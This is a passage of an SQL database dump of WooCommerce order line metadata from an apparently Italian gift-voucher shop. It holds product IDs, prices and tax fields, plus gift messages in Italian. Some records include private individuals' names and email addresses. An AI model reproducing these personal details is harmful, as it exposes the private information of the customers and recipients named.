ax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(577,65,'_qty','1'),(578,65,'_tax_class',''),(579,65,'_product_id','324'),(580,65,'_variation_id','0'),(581,65,'_line_subtotal','100'),(582,65,'_line_total','100'),(583,65,'_line_subtotal_tax','0'),(584,65,'_line_tax','0'),(585,65,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(586,66,'_qty','1'),(587,66,'_tax_class',''),(588,66,'_product_id','324'),(589,66,'_variation_id','0'),(590,66,'_line_subtotal','100'),(591,66,'_line_total','100'),(592,66,'_line_subtotal_tax','0'),(593,66,'_line_tax','0'),(594,66,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(595,67,'_qty','1'),(596,67,'_tax_class',''),(597,67,'_product_id','328'),(598,67,'_variation_id','0'),(599,67,'_line_subtotal','75'),(600,67,'_line_total','75'),(601,67,'_line_subtotal_tax','0'),(602,67,'_line_tax','0'),(603,67,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(604,68,'_qty','1'),(605,68,'_tax_class',''),(606,68,'_product_id','322'),(607,68,'_variation_id','0'),(608,68,'_line_subtotal','50'),(609,68,'_line_total','50'),(610,68,'_line_subtotal_tax','0'),(611,68,'_line_tax','0'),(612,68,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(613,69,'_qty','1'),(614,69,'_tax_class',''),(615,69,'_product_id','327'),(616,69,'_variation_id','0'),(617,69,'_line_subtotal','50'),(618,69,'_line_total','50'),(619,69,'_line_subtotal_tax','0'),(620,69,'_line_tax','0'),(621,69,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(622,70,'_qty','1'),(623,70,'_tax_class',''),(624,70,'_product_id','327'),(625,70,'_variation_id','0'),(626,70,'_line_subtotal','50'),(627,70,'_line_total','50'),(628,70,'_line_subtotal_tax','0'),(629,70,'_line_tax','0'),(630,70,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(631,71,'_qty','1'),(632,71,'_tax_class',''),(633,71,'_product_id','327'),(634,71,'_variation_id','0'),(635,71,'_line_subtotal','50'),(636,71,'_line_total','50'),(637,71,'_line_subtotal_tax','0'),(638,71,'_line_tax','0'),(639,71,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(640,72,'_qty','1'),(641,72,'_tax_class',''),(642,72,'_product_id','324'),(643,72,'_variation_id','0'),(644,72,'_line_subtotal','100'),(645,72,'_line_total','100'),(646,72,'_line_subtotal_tax','0'),(647,72,'_line_tax','0'),(648,72,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(649,73,'_qty','1'),(650,73,'_tax_class',''),(651,73,'_product_id','331'),(652,73,'_variation_id','0'),(653,73,'_line_subtotal','150'),(654,73,'_line_total','150'),(655,73,'_line_subtotal_tax','0'),(656,73,'_line_tax','0'),(657,73,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(658,74,'_qty','1'),(659,74,'_tax_class',''),(660,74,'_product_id','327'),(661,74,'_variation_id','0'),(662,74,'_line_subtotal','50'),(663,74,'_line_total','50'),(664,74,'_line_subtotal_tax','0'),(665,74,'_line_tax','0'),(666,74,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(667,75,'_qty','1'),(668,75,'_tax_class',''),(669,75,'_product_id','322'),(670,75,'_variation_id','0'),(671,75,'_line_subtotal','50'),(672,75,'_line_total','50'),(673,75,'_line_subtotal_tax','0'),(674,75,'_line_tax','0'),(675,75,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(676,76,'_qty','1'),(677,76,'_tax_class',''),(678,76,'_product_id','323'),(679,76,'_variation_id','0'),(680,76,'_line_subtotal','75'),(681,76,'_line_total','75'),(682,76,'_line_subtotal_tax','0'),(683,76,'_line_tax','0'),(684,76,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(685,77,'_qty','1'),(686,77,'_tax_class',''),(687,77,'_product_id','327'),(688,77,'_variation_id','0'),(689,77,'_line_subtotal','50'),(690,77,'_line_total','50'),(691,77,'_line_subtotal_tax','0'),(692,77,'_line_tax','0'),(693,77,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(694,78,'_qty','1'),(695,78,'_tax_class',''),(696,78,'_product_id','328'),(697,78,'_variation_id','0'),(698,78,'_line_subtotal','75'),(699,78,'_line_total','75'),(700,78,'_line_subtotal_tax','0'),(701,78,'_line_tax','0'),(702,78,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(703,79,'_qty','1'),(704,79,'_tax_class',''),(705,79,'_product_id','329'),(706,79,'_variation_id','0'),(707,79,'_line_subtotal','100'),(708,79,'_line_total','100'),(709,79,'_line_subtotal_tax','0'),(710,79,'_line_tax','0'),(711,79,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(712,80,'_qty','1'),(713,80,'_tax_class',''),(714,80,'_product_id','329'),(715,80,'_variation_id','0'),(716,80,'_line_subtotal','100'),(717,80,'_line_total','100'),(718,80,'_line_subtotal_tax','0'),(719,80,'_line_tax','0'),(720,80,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(721,81,'_qty','1'),(722,81,'_tax_class',''),(723,81,'_product_id','331'),(724,81,'_variation_id','0'),(725,81,'_line_subtotal','150'),(726,81,'_line_total','150'),(727,81,'_line_subtotal_tax','0'),(728,81,'_line_tax','0'),(729,81,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(730,82,'_qty','1'),(731,82,'_tax_class',''),(732,82,'_product_id','339'),(733,82,'_variation_id','0'),(734,82,'_line_subtotal','225'),(735,82,'_line_total','225'),(736,82,'_line_subtotal_tax','0'),(737,82,'_line_tax','0'),(738,82,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(739,83,'_qty','1'),(740,83,'_tax_class',''),(741,83,'_product_id','337'),(742,83,'_variation_id','0'),(743,83,'_line_subtotal','175'),(744,83,'_line_total','175'),(745,83,'_line_subtotal_tax','0'),(746,83,'_line_tax','0'),(747,83,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(748,84,'_qty','1'),(749,84,'_tax_class',''),(750,84,'_product_id','329'),(751,84,'_variation_id','0'),(752,84,'_line_subtotal','100'),(753,84,'_line_total','100'),(754,84,'_line_subtotal_tax','0'),(755,84,'_line_tax','0'),(756,84,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(757,85,'_qty','1'),(758,85,'_tax_class',''),(759,85,'_product_id','325'),(760,85,'_variation_id','0'),(761,85,'_line_subtotal','125'),(762,85,'_line_total','125'),(763,85,'_line_subtotal_tax','0'),(764,85,'_line_tax','0'),(765,85,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(766,86,'_qty','1'),(767,86,'_tax_class',''),(768,86,'_product_id','324'),(769,86,'_variation_id','0'),(770,86,'_line_subtotal','100'),(771,86,'_line_total','100'),(772,86,'_line_subtotal_tax','0'),(773,86,'_line_tax','0'),(774,86,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(784,88,'_qty','1'),(785,88,'_tax_class',''),(786,88,'_product_id','322'),(787,88,'_variation_id','0'),(788,88,'_line_subtotal','50'),(789,88,'_line_total','50'),(790,88,'_line_subtotal_tax','0'),(791,88,'_line_tax','0'),(792,88,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(793,89,'_qty','1'),(794,89,'_tax_class',''),(795,89,'_product_id','327'),(796,89,'_variation_id','0'),(797,89,'_line_subtotal','50'),(798,89,'_line_total','50'),(799,89,'_line_subtotal_tax','0'),(800,89,'_line_tax','0'),(801,89,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(802,90,'_qty','1'),(803,90,'_tax_class',''),(804,90,'_product_id','329'),(805,90,'_variation_id','0'),(806,90,'_line_subtotal','100'),(807,90,'_line_total','100'),(808,90,'_line_subtotal_tax','0'),(809,90,'_line_tax','0'),(810,90,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(820,92,'_qty','1'),(821,92,'_tax_class',''),(822,92,'_product_id','324'),(823,92,'_variation_id','0'),(824,92,'_line_subtotal','100'),(825,92,'_line_total','100'),(826,92,'_line_subtotal_tax','0'),(827,92,'_line_tax','0'),(828,92,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(838,94,'_qty','1'),(839,94,'_tax_class',''),(840,94,'_product_id','327'),(841,94,'_variation_id','0'),(842,94,'_line_subtotal','50'),(843,94,'_line_total','50'),(844,94,'_line_subtotal_tax','0'),(845,94,'_line_tax','0'),(846,94,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(847,95,'_qty','1'),(848,95,'_tax_class',''),(849,95,'_product_id','322'),(850,95,'_variation_id','0'),(851,95,'_line_subtotal','50'),(852,95,'_line_total','50'),(853,95,'_line_subtotal_tax','0'),(854,95,'_line_tax','0'),(855,95,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(856,96,'_qty','1'),(857,96,'_tax_class',''),(858,96,'_product_id','337'),(859,96,'_variation_id','0'),(860,96,'_line_subtotal','150'),(861,96,'_line_total','150'),(862,96,'_line_subtotal_tax','0'),(863,96,'_line_tax','0'),(864,96,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(865,97,'_qty','1'),(866,97,'_tax_class',''),(867,97,'_product_id','329'),(868,97,'_variation_id','0'),(869,97,'_line_subtotal','100'),(870,97,'_line_total','100'),(871,97,'_line_subtotal_tax','0'),(872,97,'_line_tax','0'),(873,97,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(874,98,'_qty','1'),(875,98,'_tax_class',''),(876,98,'_product_id','322'),(877,98,'_variation_id','0'),(878,98,'_line_subtotal','50'),(879,98,'_line_total','50'),(880,98,'_line_subtotal_tax','0'),(881,98,'_line_tax','0'),(882,98,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(883,99,'_qty','1'),(884,99,'_tax_class',''),(885,99,'_product_id','329'),(886,99,'_variation_id','0'),(887,99,'_line_subtotal','100'),(888,99,'_line_total','100'),(889,99,'_line_subtotal_tax','0'),(890,99,'_line_tax','0'),(891,99,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(892,100,'_qty','1'),(893,100,'_tax_class',''),(894,100,'_product_id','331'),(895,100,'_variation_id','0'),(896,100,'_line_subtotal','150'),(897,100,'_line_total','150'),(898,100,'_line_subtotal_tax','0'),(899,100,'_line_tax','0'),(900,100,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(901,101,'_qty','1'),(902,101,'_tax_class',''),(903,101,'_product_id','325'),(904,101,'_variation_id','0'),(905,101,'_line_subtotal','125'),(906,101,'_line_total','125'),(907,101,'_line_subtotal_tax','0'),(908,101,'_line_tax','0'),(909,101,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(910,102,'_qty','1'),(911,102,'_tax_class',''),(912,102,'_product_id','333'),(913,102,'_variation_id','0'),(914,102,'_line_subtotal','175'),(915,102,'_line_total','175'),(916,102,'_line_subtotal_tax','0'),(917,102,'_line_tax','0'),(918,102,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(919,103,'_product_id','435'),(920,103,'_variation_id','0'),(921,103,'_qty','1'),(922,103,'_tax_class',''),(923,103,'_line_subtotal','98'),(924,103,'_line_subtotal_tax','0'),(925,103,'_line_total','98'),(926,103,'_line_tax','0'),(927,103,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(928,103,'To','Paola Dieci'),(929,103,'From','Alice Letizia Andrea'),(930,103,'Message','\r\nUn pic-nic sulla spiaggia al tramonto, per augurarvi tanta felicità! '),(931,103,'Delivery Method','Downloadable'),(932,103,'Original Price','98'),(933,104,'_product_id','485'),(934,104,'_variation_id','0'),(935,104,'_qty','1'),(936,104,'_tax_class',''),(937,104,'_line_subtotal','115'),(938,104,'_line_subtotal_tax','0'),(939,104,'_line_total','115'),(940,104,'_line_tax','0'),(941,104,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(942,105,'_product_id','475'),(943,105,'_variation_id','0'),(944,105,'_qty','1'),(945,105,'_tax_class',''),(946,105,'_line_subtotal','115'),(947,105,'_line_subtotal_tax','0'),(948,105,'_line_total','115'),(949,105,'_line_tax','0'),(950,105,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(951,105,'To','Sara'),(952,105,'From','Betta - Marti - Mary'),(953,105,'Message','Santa Genoveffa dovrà aspettare ancora un pò... ma noi non abbiamo fretta! Nel frattempo goditi una splendida cena in questo posto magico... e magari pensaci durante uno dei brindisi!\r\nTi vogliamo bene!!! '),(954,105,'Delivery Method','Downloadable'),(955,105,'Original Price','115'),(956,106,'_product_id','475'),(957,106,'_variation_id','0'),(958,106,'_qty','1'),(959,106,'_tax_class',''),(960,106,'_line_subtotal','115'),(961,106,'_line_subtotal_tax','0'),(962,106,'_line_total','115'),(963,106,'_line_tax','0'),(964,106,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(965,106,'To','Sara'),(966,106,'From','Betta - Mary - Marty'),(967,106,'Message','Santa Genoveffa dovrà aspettare un po\'...ma noi non abbiamo fretta! \r\nNel frattempo goditi questa serata e pensaci durante il brindisi!\r\nTi vogliamo bene sorella!!!'),(968,106,'Delivery Method','Downloadable'),(969,106,'Original Price','115'),(970,107,'_product_id','475'),(971,107,'_variation_id','0'),(972,107,'_qty','1'),(973,107,'_tax_class',''),(974,107,'_line_subtotal','115'),(975,107,'_line_subtotal_tax','0'),(976,107,'_line_total','115'),(977,107,'_line_tax','0'),(978,107,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(979,107,'To','Ivo'),(980,107,'From','Tantric Soul'),(981,107,'Message','Brindo a te (alla tua vecchiaia così elegantemente indossata) ed al tuo cuore... Sulla coda del tramonto, assaporando composizioni che profumano di mare, con un calice colmo nella mano e la gioia di questo tempo. \r\nOra. \r\nTi voglio bene Ivo :o)'),(982,107,'Delivery Method','Downloadable'),(983,107,'Original Price','115'),(984,108,'_product_id','475'),(985,108,'_variation_id','0'),(986,108,'_qty','1'),(987,108,'_tax_class',''),(988,108,'_line_subtotal','115'),(989,108,'_line_subtotal_tax','0'),(990,108,'_line_total','115'),(991,108,'_line_tax','0'),(992,108,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(993,108,'To','NAN COOSEMANS'),(994,108,'From','Younite Team'),(995,108,'Message','Tanti auguri di buon compleanno Nan. :-)\r\nSei un\'anima speciale per tutti noi.\r\nAuguri dal Team Younite... e non solo. ;-)'),(996,108,'Delivery Method','Downloadable'),(997,108,'Original Price','115'),(998,109,'_product_id','472'),(999,109,'_variation_id','0'),(1000,109,'_qty','1'),(1001,109,'_tax_class',''),(1002,109,'_line_subtotal','120'),(1003,109,'_line_subtotal_tax','0'),(1004,109,'_line_total','120'),(1005,109,'_line_tax','0'),(1006,109,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1007,109,'To','Dott.ssa Elisa D\'Antonio'),(1008,109,'From','La Tua Sorellina'),(1009,109,'Message','Un dolce pensiero alla mia unica e inimitabile sorellona'),(1010,109,'Delivery Method','Downloadable'),(1011,109,'Original Price','120'),(1012,110,'_product_id','475'),(1013,110,'_variation_id','0'),(1014,110,'_qty','1'),(1015,110,'_tax_class',''),(1016,110,'_line_subtotal','115'),(1017,110,'_line_subtotal_tax','0'),(1018,110,'_line_total','115'),(1019,110,'_line_tax','0'),(1020,110,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1021,110,'To','Giada Frighi'),(1022,110,'From','Angelo Tinti'),(1023,110,'Message','Per Giada,\r\nCon amore e ambizione per questo nuovo anno, per te e per noi.\r\nTanti auguri di buon compleanno, il tuo Angelo.'),(1024,110,'Delivery Method','Downloadable'),(1025,110,'Original Price','115'),(1026,111,'_product_id','211'),(1027,111,'_variation_id','0'),(1028,111,'_qty','1'),(1029,111,'_tax_class',''),(1030,111,'_line_subtotal','60'),(1031,111,'_line_subtotal_tax','0'),(1032,111,'_line_total','60'),(1033,111,'_line_tax','0'),(1034,111,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1035,112,'_product_id','216'),(1036,112,'_variation_id','0'),(1037,112,'_qty','1'),(1038,112,'_tax_class',''),(1039,112,'_line_subtotal','120'),(1040,112,'_line_subtotal_tax','0'),(1041,112,'_line_total','120'),(1042,112,'_line_tax','0'),(1043,112,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1044,113,'_product_id','211'),(1045,113,'_variation_id','0'),(1046,113,'_qty','1'),(1047,113,'_tax_class',''),(1048,113,'_line_subtotal','70'),(1049,113,'_line_subtotal_tax','0'),(1050,113,'_line_total','70'),(1051,113,'_line_tax','0'),(1052,113,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1053,114,'_product_id','211'),(1054,114,'_variation_id','0'),(1055,114,'_qty','1'),(1056,114,'_tax_class',''),(1057,114,'_line_subtotal','60'),(1058,114,'_line_subtotal_tax','0'),(1059,114,'_line_total','60'),(1060,114,'_line_tax','0'),(1061,114,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1071,116,'_product_id','211'),(1072,116,'_variation_id','0'),(1073,116,'_qty','1'),(1074,116,'_tax_class',''),(1075,116,'_line_subtotal','60'),(1076,116,'_line_subtotal_tax','0'),(1077,116,'_line_total','60'),(1078,116,'_line_tax','0'),(1079,116,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1080,117,'_product_id','211'),(1081,117,'_variation_id','0'),(1082,117,'_qty','1'),(1083,117,'_tax_class',''),(1084,117,'_line_subtotal','60'),(1085,117,'_line_subtotal_tax','0'),(1086,117,'_line_total','60'),(1087,117,'_line_tax','0'),(1088,117,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1089,118,'_product_id','216'),(1090,118,'_variation_id','0'),(1091,118,'_qty','1'),(1092,118,'_tax_class',''),(1093,118,'_line_subtotal','120'),(1094,118,'_line_subtotal_tax','0'),(1095,118,'_line_total','120'),(1096,118,'_line_tax','0'),(1097,118,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1098,119,'_product_id','220'),(1099,119,'_variation_id','0'),(1100,119,'_qty','1'),(1101,119,'_tax_class',''),(1102,119,'_line_subtotal','180'),(1103,119,'_line_subtotal_tax','0'),(1104,119,'_line_total','180'),(1105,119,'_line_tax','0'),(1106,119,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1107,120,'_product_id','216'),(1108,120,'_variation_id','0'),(1109,120,'_qty','1'),(1110,120,'_tax_class',''),(1111,120,'_line_subtotal','120'),(1112,120,'_line_subtotal_tax','0'),(1113,120,'_line_total','120'),(1114,120,'_line_tax','0'),(1115,120,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1116,121,'_product_id','211'),(1117,121,'_variation_id','0'),(1118,121,'_qty','1'),(1119,121,'_tax_class',''),(1120,121,'_line_subtotal','60'),(1121,121,'_line_subtotal_tax','0'),(1122,121,'_line_total','60'),(1123,121,'_line_tax','0'),(1124,121,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1125,122,'_product_id','216'),(1126,122,'_variation_id','0'),(1127,122,'_qty','1'),(1128,122,'_tax_class',''),(1129,122,'_line_subtotal','120'),(1130,122,'_line_subtotal_tax','0'),(1131,122,'_line_total','120'),(1132,122,'_line_tax','0'),(1133,122,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1134,123,'_product_id','216'),(1135,123,'_variation_id','0'),(1136,123,'_qty','1'),(1137,123,'_tax_class',''),(1138,123,'_line_subtotal','120'),(1139,123,'_line_subtotal_tax','0'),(1140,123,'_line_total','120'),(1141,123,'_line_tax','0'),(1142,123,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1143,124,'_product_id','211'),(1144,124,'_variation_id','0'),(1145,124,'_qty','1'),(1146,124,'_tax_class',''),(1147,124,'_line_subtotal','60'),(1148,124,'_line_subtotal_tax','0'),(1149,124,'_line_total','60'),(1150,124,'_line_tax','0'),(1151,124,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1152,125,'_product_id','211'),(1153,125,'_variation_id','0'),(1154,125,'_qty','1'),(1155,125,'_tax_class',''),(1156,125,'_line_subtotal','60'),(1157,125,'_line_subtotal_tax','0'),(1158,125,'_line_total','60'),(1159,125,'_line_tax','0'),(1160,125,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1161,126,'_product_id','211'),(1162,126,'_variation_id','0'),(1163,126,'_qty','1'),(1164,126,'_tax_class',''),(1165,126,'_line_subtotal','60'),(1166,126,'_line_subtotal_tax','0'),(1167,126,'_line_total','60'),(1168,126,'_line_tax','0'),(1169,126,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1170,127,'_product_id','213'),(1171,127,'_variation_id','0'),(1172,127,'_qty','1'),(1173,127,'_tax_class',''),(1174,127,'_line_subtotal','90'),(1175,127,'_line_subtotal_tax','0'),(1176,127,'_line_total','90'),(1177,127,'_line_tax','0'),(1178,127,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1179,128,'_product_id','548'),(1180,128,'_variation_id','0'),(1181,128,'_qty','1'),(1182,128,'_tax_class',''),(1183,128,'_line_subtotal','150'),(1184,128,'_line_subtotal_tax','0'),(1185,128,'_line_total','150'),(1186,128,'_line_tax','0'),(1187,128,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1188,128,'To','m.palomba77@libero.it'),(1189,128,'From','matteo palomba'),(1190,128,'Message','cena per domenico e cristiana per un buon natale.'),(1191,128,'Delivery Method','Mail to recipient'),(1192,128,'Original Price','150'),(1202,130,'_product_id','220'),(1203,130,'_variation_id','0'),(1204,130,'_qty','1'),(1205,130,'_tax_class',''),(1206,130,'_line_subtotal','180'),(1207,130,'_line_subtotal_tax','0'),(1208,130,'_line_total','180'),(1209,130,'_line_tax','0'),(1210,130,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1211,131,'_product_id','211'),(1212,131,'_variation_id','0'),(1213,131,'_qty','1'),(1214,131,'_tax_class',''),(1215,131,'_line_subtotal','60'),(1216,131,'_line_subtotal_tax','0'),(1217,131,'_line_total','60'),(1218,131,'_line_tax','0'),(1219,131,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1220,132,'_product_id','211'),(1221,132,'_variation_id','0'),(1222,132,'_qty','1'),(1223,132,'_tax_class',''),(1224,132,'_line_subtotal','60'),(1225,132,'_line_subtotal_tax','0'),(1226,132,'_line_total','60'),(1227,132,'_line_tax','0'),(1228,132,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1229,133,'_product_id','472'),(1230,133,'_variation_id','0'),(1231,133,'_qty','1'),(1232,133,'_tax_class',''),(1233,133,'_line_subtotal','120'),(1234,133,'_line_subtotal_tax','0'),(1235,133,'_line_total','120'),(1236,133,'_line_tax','0'),(1237,133,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1238,133,'To','stefyfabbri82@gmail.com'),(1239,133,'From','Stefy e Monica'),(1240,133,'Message','Tanti auguri....per un Natale gustoso!'),(1241,133,'Delivery Method','Mail to recipient'),(1242,133,'Original Price','120'),(1243,134,'_product_id','216'),(1244,134,'_variation_id','0'),(1245,134,'_qty','1'),(1246,134,'_tax_class',''),(1247,134,'_line_subtotal','120'),(1248,134,'_line_subtotal_tax','0'),(1249,134,'_line_total','120'),(1250,134,'_line_tax','0'),(1251,134,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1252,135,'_product_id','211'),(1253,135,'_variation_id','0'),(1254,135,'_qty','1'),(1255,135,'_tax_class',''),(1256,135,'_line_subtotal','60'),(1257,135,'_line_subtotal_tax','0'),(1258,135,'_line_total','60'),(1259,135,'_line_tax','0'),(1260,135,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1261,136,'_product_id','211'),(1262,136,'_variation_id','0'),(1263,136,'_qty','1'),(1264,136,'_tax_class',''),(1265,136,'_line_subtotal','60'),(1266,136,'_line_subtotal_tax','0'),(1267,136,'_line_total','60'),(1268,136,'_line_tax','0'),(1269,136,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1270,137,'_product_id','211'),(1271,137,'_variation_id','0'),(1272,137,'_qty','1'),(1273,137,'_tax_class',''),(1274,137,'_line_subtotal','60'),(1275,137,'_line_subtotal_tax','0'),(1276,137,'_line_total','60'),(1277,137,'_line_tax','0'),(1278,137,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1279,138,'_product_id','213'),(1280,138,'_variation_id','0'),(1281,138,'_qty','1'),(1282,138,'_tax_class',''),(1283,138,'_line_subtotal','90'),(1284,138,'_line_subtotal_tax','0'),(1285,138,'_line_total','90'),(1286,138,'_line_tax','0'),(1287,138,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1288,139,'_product_id','213'),(1289,139,'_variation_id','0'),(1290,139,'_qty','1'),(1291,139,'_tax_class',''),(1292,139,'_line_subtotal','90'),(1293,139,'_line_subtotal_tax','0'),(1294,139,'_line_total','90'),(1295,139,'_line_tax','0'),(1296,139,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1297,140,'_product_id','220'),(1298,140,'_variation_id','0'),(1299,140,'_qty','1'),(1300,140,'_tax_class',''),(1301,140,'_line_subtotal','180'),(1302,140,'_line_subtotal_tax','0'),(1303,140,'_line_total','180'),(1304,140,'_line_tax','0'),(1305,140,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1306,141,'_product_id','435'),(1307,141,'_variation_id','0'),(1308,141,'_qty','1'),(1309,141,'_tax_class',''),(1310,141,'_line_subtotal','98'),(1311,141,'_line_subtotal_tax','0'),(1312,141,'_line_total','98'),(1313,141,'_line_tax','0'),(1314,141,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1315,141,'To','davibacio@gmail.com'),(1316,141,'From','Famiglia Bacciocchi'),(1317,141,'Message','A Mari e Dani.\r\nTanti cari auguri di buon Natale e di un sereno anno nuovo. E... buon appetito'),(1318,141,'Delivery Method','Downloadable'),(1319,141,'Original Price','98'),(1320,142,'_product_id','211'),(1321,142,'_variation_id','0'),(1322,142,'_qty','1'),(1323,142,'_tax_class',''),(1324,142,'_line_subtotal','60'),(1325,142,'_line_subtotal_tax','0'),(1326,142,'_line_total','60'),(1327,142,'_line_tax','0'),(1328,142,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1329,143,'_product_id','211'),(1330,143,'_variation_id','0'),(1331,143,'_qty','1'),(1332,143,'_tax_class',''),(1333,143,'_line_subtotal','60'),(1334,143,'_line_subtotal_tax','0'),(1335,143,'_line_total','60'),(1336,143,'_line_tax','0'),(1337,143,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1338,144,'_product_id','211'),(1339,144,'_variation_id','0'),(1340,144,'_qty','1'),(1341,144,'_tax_class',''),(1342,144,'_line_subtotal','60'),(1343,144,'_line_subtotal_tax','0'),(1344,144,'_line_total','60'),(1345,144,'_line_tax','0'),(1346,144,'